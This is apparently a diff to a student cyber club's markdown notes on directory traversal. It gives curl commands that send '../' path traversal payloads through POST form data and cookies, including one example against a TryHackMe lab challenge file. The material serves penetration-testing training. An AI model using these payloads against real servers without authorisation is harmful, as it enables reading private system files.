CedarvilleCyber/RedTeamVault/Techniques/Web Applications/Directory Traversal.md

 >[!note]
 > It's entirely possible that you'll encounter a filtration system that combines multiple filtration methods.
 Don't give up after trying the basics- design your path traversals to defeat combinations of multiple filtration methods if necessary!

+# Various Tactics:
+### POST Request:
+Generic form:
+`curl http://<ip-addr>/dir/to/file.php --data-raw 'file=../../../../../directory/file.extension'

+Example from THM:
+`curl http://10.10.194.104/challenges/chall1.php --data-raw 'file=../../../../../etc/flag1'`

+You can also Inspect Element on a page, then change forms from GET requests to POST requests to achieve a similar effect.
+The `curl` example seems easier to replicate, though.

+### Cookies:
+Sometimes websites use cookies to authenticate.
+Thus, users without the admin cookies can't see webpages that could be vulnerable.

+Generic form:
+`curl http://<ip-addr>/dir/to/file.php --cookie "Cookie1=Value1; Cookie2=Value2" --data-raw 'file=../../../../directory/file.extension'

+You can also edit and resend HTTP requests from the developer tools (Inspect Element) window, which allows you to change the cookies and accomplish what you need to.

 For futher research, see TryHackMe's File Inclusion room in the Intro To Web Hacking module of the Junior Pentesting Path.